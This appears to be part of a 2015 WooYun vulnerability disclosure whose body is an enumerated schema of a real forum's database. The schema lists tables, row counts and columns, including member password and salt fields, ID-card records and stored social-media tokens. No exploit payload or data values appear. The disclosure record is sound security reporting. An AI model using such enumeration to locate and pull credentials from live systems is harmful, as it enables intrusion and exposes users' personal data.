template
global
pre_forum_threadprofile_group
count:0
gid
tpid
pre_forum_threadrush
count:0
tid
stopfloor
starttimefrom
starttimeto
rewardfloor
creditlimit
replylimit
pre_forum_threadtype
count:0
typeid
fid
displayorder
name
description
icon
special
modelid
expiration
template
stemplate
ptemplate
btemplate
pre_forum_trade
count:0
tid
pid
typeid
sellerid
seller
account
tenpayaccount
subject
price
amount
quality
locus
transport
ordinaryfee
expressfee
emsfee
itemtype
dateline
expiration
lastbuyer
lastupdate
totalitems
tradesum
closed
aid
displayorder
costprice
credit
costcredit
credittradesum
pre_forum_tradecomment
count:0
id
orderid
pid
type
raterid
rater
rateeid
ratee
message
explanation
score
dateline
pre_forum_tradelog
count:0
tid
pid
orderid
tradeno
paytype
subject
price
quality
itemtype
number
tax
locus
sellerid
seller
selleraccount
tenpayaccount
buyerid
buyer
buyercontact
buyercredits
buyermsg
status
lastupdate
offline
buyername
buyerzip
buyerphone
buyermobile
transport
transportfee
baseprice
discount
ratestatus
message
credit
basecredit
pre_forum_typeoption
count:6
optionid
classid
displayorder
expiration
protect
title
description
identifier
type
unit
rules
permprompt
pre_forum_typeoptionvar
count:0
sortid
tid
fid
optionid
expiration
value
pre_forum_typevar
count:0
sortid
optionid
available
required
unchangeable
search
displayorder
subjectshow
pre_forum_warning
count:0
wid
pid
operatorid
operator
authorid
author
dateline
reason
pre_home_album
count:23
albumid
albumname
catid
uid
username
dateline
updatetime
picnum
pic
picflag
friend
password
target_ids
favtimes
sharetimes
depict
pre_home_album_category
count:0
catid
upid
catname
num
displayorder
pre_home_appcreditlog
count:0
logid
uid
appid
appname
type
credit
note
dateline
pre_home_blacklist
count:0
uid
buid
dateline
pre_home_blog
count:10458
blogid
uid
username
subject
classid
catid
viewnum
replynum
hot
dateline
picflag
noreply
friend
password
favtimes
sharetimes
status
click1
click2
click3
click4
click5
click6
click7
click8
pre_home_blog_category
count:0
catid
upid
catname
num
displayorder
pre_home_blog_moderate
count:10427
id
status
dateline
pre_home_blogfield
count:10458
blogid
uid
pic
tag
message
postip
port
related
relatedtime
target_ids
hotuser
magiccolor
magicpaper
pushedaid
pre_home_class
count:10
classid
classname
uid
dateline
pre_home_click
count:15
clickid
name
icon
idtype
available
displayorder
pre_home_clickuser
count:93
uid
username
id
idtype
clickid
dateline
pre_home_comment
count:17
cid
uid
id
idtype
authorid
author
ip
port
dateline
message
magicflicker
status
pre_home_comment_moderate
count:0
id
idtype
status
dateline
pre_home_docomment
count:0
id
upid
doid
uid
username
dateline
message
ip
grade
pre_home_doing
count:27
doid
uid
username
from
dateline
message
ip
port
replynum
status
pre_home_doing_moderate
count:0
id
status
dateline
pre_home_favorite
count:16
favid
uid
id
idtype
spaceuid
title
description
dateline
pre_home_feed
count:12
feedid
appid
icon
uid
username
dateline
friend
hash_template
hash_data
title_template
title_data
body_template
body_data
body_general
image_1
image_1_link
image_2
image_2_link
image_3
image_3_link
image_4
image_4_link
target_ids
id
idtype
hot
pre_home_feed_app
count:0
feedid
appid
icon
uid
username
dateline
friend
hash_template
hash_data
title_template
title_data
body_template
body_data
body_general
image_1
image_1_link
image_2
image_2_link
image_3
image_3_link
image_4
image_4_link
target_ids
pre_home_follow
count:46
uid
username
followuid
fusername
bkname
status
mutual
dateline
pre_home_follow_feed
count:0
feedid
uid
username
tid
note
dateline
pre_home_follow_feed_archiver
count:0
feedid
uid
username
tid
note
dateline
pre_home_friend
count:10
uid
fuid
fusername
gid
num
dateline
note
pre_home_friend_request
count:47
uid
fuid
fusername
gid
note
dateline
pre_home_friendlog
count:4
uid
fuid
action
dateline
pre_home_notification
count:244286
id
uid
type
new
authorid
author
note
dateline
from_id
from_idtype
from_num
category
pre_home_pic
count:267
picid
albumid
uid
username
dateline
postip
port
filename
title
type
size
filepath
thumb
remote
hot
sharetimes
click1
click2
click3
click4
click5
click6
click7
click8
magicframe
status
pre_home_pic_moderate
count:70
id
status
dateline
pre_home_picfield
count:1
picid
hotuser
pre_home_poke
count:10
uid
fromuid
fromusername
note
dateline
iconid
pre_home_pokearchive
count:11
pid
pokeuid
uid
fromuid
note
dateline
iconid
pre_home_share
count:12
sid
itemid
type
uid
username
fromuid
dateline
title_template
body_template
body_data
body_general
image
image_link
hot
hotuser
status
pre_home_share_moderate
count:6
id
status
dateline
pre_home_show
count:0
uid
username
unitprice
credit
note
pre_home_specialuser
count:1
uid
username
status
dateline
reason
opuid
opusername
displayorder
pre_home_userapp
count:0
uid
appid
appname
privacy
allowsidenav
allowfeed
allowprofilelink
narrow
menuorder
displayorder
pre_home_userappfield
count:0
uid
appid
profilelink
myml
pre_home_visitor
count:102
uid
vuid
vusername
dateline
pre_iknow_guide
count:73
gid
uid
verifystatus
emailstatus
avatarstatus
pre_iwenwen_answers
count:0
date
post_num
pre_iwenwen_backflow
count:0
tid
pid
status
qid
answerid
sync_time
pre_mobile_setting
count:2
skey
svalue
pre_mobile_wechat_authcode
count:0
sid
code
uid
status
createtime
pre_mobile_wechat_masssend
count:0
id
type
name
resource_id
group_id
text
media_id
created_at
sent_at
msg_id
res_status
res_totalcount
res_filtercount
res_sentcount
res_errorcount
res_finish_at
pre_mobile_wechat_resource
count:0
id
name
dateline
type
data
pre_mobile_wsq_threadlist
count:2
skey
svalue
pre_mobileoem_member
count:0
uid
newpush
pre_mobileoem_pushthreads
count:0
uid
type
tid
dateline
pre_nimba_rename
count:12
id
uid
username
newname
reason
dateline
status
pre_plugin_lj_sina
count:52
uid
sinauid
fsign
hsign
token
sqtx
sina_username
pre_plugin_lj_sina_message
count:1
tid
mid
id
pre_plugin_sina_blog_ht
count:0
id
sina_uid
blogid
uid
sina_mid
sina_id
username
timestamp
title
pre_plugin_sina_doing_ht
count:0
id
sina_uid
doid
uid
sina_mid
sina_id
username
timestamp
title
pre_plugin_sina_follow_ht
count:0
id
sina_uid
feedid
uid
sina_mid
sina_id
username
timestamp
title
pre_plugin_sina_forum_ht
count:0
id
sina_uid
tid
uid
sina_mid
sina_id
timestamp
username
subject
pre_plugin_sina_ht
count:4
id
tid
mid
uid
pre_plugin_sina_mhht_message
count:6
id
aid
sina_mid
sina_uid
sina_user
time
message
blogid
pre_plugin_sina_newthread
count:24
id
uid
tid
pid
title
content
sign
blogid
aid
pre_plugin_sina_protal_ht
count:5
id
sina_uid
aid
uid
sina_mid
sina_id
username
timestamp
title
pre_plugin_sina_share_ht
count:0
id
sina_uid
sid
uid
sina_mid
sina_id
username
timestamp
title
pre_plugin_sina_sqtx
count:34
id
uid
bind_time
portal_ft
tongzhi
blog_ft
share_ft
follow_ft
doing_ft
pre_portal_article_content
count:886
cid
aid
id
idtype
title
content
pageorder
dateline
pre_portal_article_count
count:886
aid
catid
viewnum
commentnum
favtimes
sharetimes
pre_portal_article_moderate
count:4
id
status
dateline
pre_portal_article_related
count:56
aid
raid
displayorder
pre_portal_article_title
count:347
aid
catid
bid
uid
username
title
highlight
author
from
fromurl
url
summary
pic
thumb
remote
id
idtype
contents
allowcomment
owncomment
click1
click2
click3
click4
click5
click6
click7
click8
tag
dateline
status
showinnernav
preaid
nextaid
htmlmade
htmlname
htmldir
pre_portal_article_trash
count:539
aid
content
pre_portal_attachment
count:2227
attachid
uid
dateline
filename
filetype
filesize
attachment
isimage
thumb
remote
aid
pre_portal_category
count:59
catid
upid
catname
articles
allowcomment
displayorder
notinheritedarticle
notinheritedblock
domain
url
uid
username
dateline
closed
shownav
description
seotitle
keyword
primaltplname
articleprimaltplname
disallowpublish
foldername
notshowarticlesummay
perpage
maxpages
noantitheft
lastpublish
pre_portal_category_permission
count:49
catid
uid
allowpublish
allowmanage
inheritedcatid
pre_portal_comment
count:43
cid
uid
username
id
idtype
postip
port
dateline
status
message
pre_portal_comment_moderate
count:0
id
idtype
status
dateline
pre_portal_presidium
count:0
pid
uid
order
pre_portal_presidium_article
count:7
id
pid
uid
aid
dateline
publish
pre_portal_rsscache
count:154
lastupdate
catid
aid
dateline
catname
author
subject
description
pre_portal_topic
count:2
topicid
title
name
domain
summary
keyword
cover
picflag
primaltplname
useheader
usefooter
uid
username
viewnum
dateline
closed
allowcomment
commentnum
htmlmade
htmldir
pre_portal_topic_pic
count:0
picid
topicid
uid
username
dateline
filename
title
size
filepath
thumb
remote
pre_security_evilpost
count:2112
pid
tid
type
evilcount
eviltype
createtime
operateresult
isreported
censorword
pre_security_eviluser
count:91
uid
evilcount
eviltype
createtime
operateresult
isreported
pre_security_failedlog
count:0
id
reporttype
tid
pid
uid
failcount
createtime
posttime
delreason
scheduletime
lastfailtime
extra1
extra2
pre_security_member
count:1
uid
passlevel
note
grade
resideprovince
residecity
residedist
residecommunity
pre_singcere_authenticate
count:7289
id
uid
username
name
firstletter
phone
zipcode
adds
province
city
idcardcode
idcardfrontimg
idcardbackimg
membercardcode
membercardimg
corplicenseimg
moremsg
info
adminmsg
groupid
typeid
dateline
status
pre_singcere_portalext
count:155
id
aid
typeid
data
pre_singcere_wxpublic_bind
count:676
id
wxcode
uid
username
status
dateline
coordinate
pre_singcere_wxpublic_cmd
count:13
id
cmdname
alias
cmdrtn
helptext
displayorder
status
type
responsetype
pattern
pre_singcere_wxpublic_menu
count:10
id
upid
type
name
key
actionstr
displayorder
pre_singcere_wxpublic_richresponse
count:0
id
cmdid
title
imgurl
link
description
pre_singcere_wxpublic_share
count:60
id
uid
username
type
content
filesize
remote
dateline
from
likenum
commentnum
description
pre_singcere_wxpublic_share_comment
count:6
cid
shareid
uid
username
message
dateline
pre_ucenter_admins
count:1
uid
username
allowadminsetting
allowadminapp
allowadminuser
allowadminbadword
allowadmintag
allowadminpm
allowadmincredits
allowadmindomain
allowadmindb
allowadminnote
allowadmincache
allowadminlog
pre_ucenter_applications
count:1
appid
type
name
url
authkey
ip
viewprourl
apifilename
charset
dbcharset
synlogin
recvnote
extra
tagtemplates
allowips
pre_ucenter_badwords
count:0
id
admin
find
replacement
findpattern
pre_ucenter_domains
count:0
id
domain
ip
pre_ucenter_failedlogins
count:13
ip
count
lastupdate
pre_ucenter_feeds
count:0
feedid
appid
icon
uid
username
dateline
hash_template
hash_data
title_template
title_data
body_template
body_data
body_general
image_1
image_1_link
image_2
image_2_link
image_3
image_3_link
image_4
image_4_link
target_ids
pre_ucenter_friends
count:0
uid
friendid
direction
version
delstatus
comment
pre_ucenter_mailqueue
count:0
mailid
touid
tomail
frommail
subject
message
charset
htmlon
level
dateline
failures
appid
pre_ucenter_memberfields
count:234805
uid
blacklist
pre_ucenter_members
count:234804
uid
username
password
email
myid
myidkey
regip
regdate
lastloginip
lastlogintime
salt
secques
pre_ucenter_mergemembers
count:0
appid
username
pre_ucenter_newpm
count:27
uid
pre_ucenter_notelist
count:1197
noteid
operation
closed
totalnum
succeednum
getdata
postdata
dateline
pri
app1
pre_ucenter_pm_indexes
count:57
pmid
plid
pre_ucenter_pm_lists
count:44
plid
authorid
pmtype
subject
members
min_max
dateline
lastmessage
pre_ucenter_pm_members
count:88
plid
uid
isnew
pmnum
lastupdate
lastdateline
pre_ucenter_pm_messages_0
count:7
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_1
count:7
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_2
count:5
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_3
count:7
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_4
count:6
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_5
count:6
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_6
count:5
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_7
count:5
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_8
count:5
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_pm_messages_9
count:4
pmid
plid
authorid
message
delstatus
dateline
pre_ucenter_protectedmembers
count:1
uid
username
appid
dateline
admin
pre_ucenter_settings
count:26
k
v
pre_ucenter_sqlcache
count:0
sqlid
data
expiry
pre_ucenter_tags
count:0
tagname
appid
data
expiration
pre_ucenter_vars
count:4
name
value
pre_vgallery_ablist
count:16
bid
vid
jid
apid
btid
bpid
isdanmu
vurl
keyid
subject
tagkey
tagstr
timelong
chkup
chkdown
valuates
bpoll
sorting
displayer
dateline
purl
remote
pre_vgallery_actor
count:0
aid
name
firstname
alias
sex
director
region
pcode
photo
ashot
pre_vgallery_ad
count:2
id
styleid
subject
message
width
height
displayer
clicks
pre_vgallery_album
count:1
id
fid
vid
picture
spic
title
link1
link2
displayer
byorder
remote
pre_vgallery_dm_polls
count:0
did
dvid
authorid
color
fontsize
mode
playtime
dateline
message
pre_vgallery_evaluate
count:18
id
vid
uid
dateline
types
chk_up
chk_down
polls
pre_vgallery_evaluate_tc
count:1
vid
evaluate_r
evaluate_c
pre_vgallery_favorites
count:52
id
vid
uid
dateline
pre_vgallery_flashid
count:16
pid
fpname
usecmp
hdstyle
fptemplate
fpskin
fphack
piclist
sorting
fpdomain
fpstart
fpmsg
pre_vgallery_indexset
count:0
id
subject
styleid
typeid
dsp
moremsg
value
getsum
getstyle
pre_vgallery_join
count:15
jid
vid
pid
idkey
idname
tvurl
vsum
sorting
finish
pre_vgallery_member
count:657
mid
shares
ablists
favsum
hots
pushup
pushdown
dateline
pre_vgallery_pay
count:0
id
uid
vid
author
money
price
dateline
pre_vgallery_paycount
count:0
vid
pnum
prices
lastday
pre_vgallery_poll
count:0
id
vid
bid
uid
dateline
audit
post
pre_vgallery_report
count:2
id
vid
uid
dateline
onsend
message
pre_vgallery_seo
count:17
seoid
vkey
vpage
val
vfucan
pre_vgallery_setting
count:63
sorting
vkey
val
vdemo
pre_vgallery_sort
count:54
sid
sup
band
sort
scolor
dps
indexcap
available
sygroup
regroup
sortman
sortmoney
rewid
rehei
istv
isdanmu
seoradio
repage
seokey
sidtmp
title
iszongyi
pre_vgallery_subtitle
count:0
zmid
vid
sname
slang
surl
roffset
autoload
scid
svote
uid
dateline
disabled
pre_vgallery_tack
count:22
vid
sidstr
typeid
tid
pid
upmsg
topimg
director
actor
uid
polls
tag
replyuid
chk_up
chk_down
pgallery
vinfo
pre_vgallery_tag
count:16
tagid
tagname
status
ashot
pre_vgallery_tags
count:26
tagid
tagname
itemid
itembid
idtype
pre_vgallery_top5
count:10
id
vid
title
uid
dateline
dps
picture
remote
pre_vgallerys
count:16
id
fid
sid
sid2
sid3
sid4
album
vprice
position
vsubject
purl
address
years
language
dateline
timelong
views
valuate
audit
updateline
abtotal
vsum
remote
pre_xwb_bind_info
count:37
uid
sina_uid
token
tsecret
profile
pre_xwb_bind_thread
count:1
tid
mid
type
pre_xwb_session
count:0
sessionid
lasttime
data
pre_yyd_draw_atten
count:0
nid
uid
atten
timestamp
pre_yyd_draw_item
count:0
nid
title
groups
defination
status
type
tid
times
message
send
last
credit
cost
img
intervaltime
pre_yyd_draw_muti
count:0
qid
nid
pro
content
send
time
pre_yyd_draw_sing
count:0
qid
nid
content
send
time
weibo_account_proxy
count:1
id
sina_uid
screen_name
token
secret
weibo_ad
count:3
id
content
using
add_time
name
description
page
flag
config
width
height
remarks
weibo_admin
count:1
id
sina_uid
pwd
add_time
is_root
group_id
weibo_admin_group
count:3
gid
group_name
permissions
description
weibo_celeb
count:0
c_id1
c_id2
char_index
sina_uid
nick
face
verified
sort
add_time
id
weibo_celeb_category
count:0
id
parent_id
name
sort
add_time
status
recommended
color
weibo_comment_copy
count:0
cid
sina_uid
uid
mid
m_uid
reply_cid
reply_uid
content
source
post_ip
dateline
sina_nick
disabled
weibo_comment_delete
count:0
id
sina_uid
sina_nick
mid
reply_cid
content
post_ip
dateline
add_time
weibo_comment_verify
count:0
id
sina_uid
sina_nick
token
token_secret
mid
reply_cid
content
post_ip
dateline
forward
weibo_component_cfg
count:28
component_id
cfgName
cfgValue
desc
weibo_component_topic
count:1
id
topic_id
topic
date_time
sort_num
ext1
weibo_component_topiclist
count:2
topic_id
topic_name
native
sort
app_with
type
weibo_component_usergroups
count:2
group_id
group_name
native
related_id
type
weibo_component_users
count:2
group_id
uid
sort_num
nickname
remark
id
weibo_components
count:20
component_id
name
title
type
native
component_type
symbol
desc
preview_img
component_cty
weibo_content_unit
count:0
id
unit_name
title
width
height
target
type
skin
colors
show_title
show_border
show_logo
show_publish
auto_scroll
add_time
weibo_disable_items
count:0
kw_id
type
item
comment
admin_name
admin_id
user
publish_time
add_time
weibo_event_comment
count:0
event_id
wb_id
weibo
comment_time
weibo_event_join
count:0
sina_uid
event_id
contact
notes
join_time
weibo_events
count:0
id
title
addr
desc
cost
sina_uid
nickname
realname
phone
start_time
end_time
pic
wb_id
join_num
view_num
comment_num
state
other
modify_time
add_time
add_ip
weibo_feedback
count:296
id
content
uid
nickname
mail
qq
tel
addtime
ip
weibo_interview_wb
count:0
ask_id
answer_wb
interview_id
state
ask_uid
answer_uid
weibo
answer_weibo
weibo_interview_wb_atme
count:0
interview_id
ask_id
at_uid
answer_wb
weibo
weibo_item_groups
count:1
id
group_id
item_id
item_name
sort_num
weibo_keep_userdomain
count:17
keep_domain
weibo_local_pm_content
count:1
id
iid
sender_id
recipient_id
created_at
recipient_unread
last_del_uid
text
weibo_local_pm_index
count:1
iid
actors
weibo_local_pm_index_user
count:2
sina_uid
iid
unread_count
total_number
lasttime
last_id
last_data
weibo_log_error
count:0
id
soft
version
akey
type
level
msg
extra
log_time
weibo_log_error_api
count:0
id
soft
version
akey
type
level
msg
extra
log_time
weibo_log_http
count:0
id
url
base_string
key_string
http_code
ret
post_data
request_time
total_time
s_ip
log_time
weibo_log_info
count:0
id
soft
version
akey
type
level
msg
extra
log_time
weibo_log_info_api
count:0
id
soft
version
akey
type
level
msg
extra
log_time
weibo_micro_interview
count:0
id
title
desc
banner_img
cover_img
state
wb_state
master
guest
backgroup_img
backgroup_color
start_time
end_time
add_time
backgroup_style
custom_color
notice_time
weibo_micro_live
count:0
id
title
trends
desc
code
start_time
end_time
master
guest
banner_img
cover_img
backgroup_img
backgroup_style
backgroup_color
custom_color
state
wb_state
notice_time
add_time
weibo_micro_live_wb
count:0
live_id
wb_id
weibo
type
state
add_time
weibo_nav
count:7
id
name
parent_id
in_use
sort_num
page_id
is_blank
url
type
isNative
weibo_notice
count:0
notice_id
sender_id
title
content
add_time
available_time
weibo_notice_recipients
count:0
kid
notice_id
recipient_id
weibo_page_manager
count:11
page_id
component_id
title
position
sort_num
in_use
id
isNative
param
weibo_page_prototype
count:2
id
name
desc
type
components
url
weibo_pages
count:9
page_id
page_name
desc
native
url
prototype_id
type
params
weibo_plugins
count:5
plugin_id
title
desc
in_use
weibo_profile_ad
count:0
link_id
title
link
add_time
weibo_sessions
count:0
sesskey
expiry
value
weibo_skin_groups
count:0
style_id
style_name
sort_num
weibo_skins
count:12
skin_id
name
directory
desc
state
style_id
sort_num
weibo_subject
count:0

漏洞证明:

修复方案:

版权声明:转载请注明来源 渔村安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-27 08:13

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系渠道向网站管理单位通报.

最新状态:

暂无